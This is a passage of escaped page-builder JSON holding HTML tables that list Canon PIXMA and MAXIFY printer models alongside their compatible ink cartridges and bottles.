width=\\\"208\\\"><p>PGI-2700XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>MAXIFY MB5470<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-2700 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E3170<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-57S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E410<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-57S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4c78b87\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"71e2027\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E4270<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-57S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E470<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-57S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E477<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E480<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E510<\\/p><\\/td><td width=\\\"208\\\"><p>CL-98 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-88 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E560<\\/p><\\/td><td width=\\\"208\\\"><p>CL-99 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-89 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E560 \\/ E560R<\\/p><\\/td><td width=\\\"208\\\"><p>CL-99 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-89 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G1000<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G1010<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G2010<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G3000<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G3010<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G4010<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP100<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-36 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-35 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP110<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-36 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-35 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP110 (with battery)<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-36 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-35 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP1300<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP2770 \\/ iP2772<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP2870S<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"13e8990\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"70107ac\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP4200<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP7270<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-751 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP8770<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-751 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iX6770<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-751 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-755XXL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iX6870<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-751 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-755XXL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MG2570S<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MG2577S<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745XL (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ac4d506\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"2645364\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62e0d92\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MG3570<\\/p><\\/td><td width=\\\"208\\\"><p>CL-741 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-741XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740\\/CL-741 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MG3670<\\/p><\\/td><td width=\\\"208\\\"><p>CL-741 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-741XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740\\/CL-741 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MG7570<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-751 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP160<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP170<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP180<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP228<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-831 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-830 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP237<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP245<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP258<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP276<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td 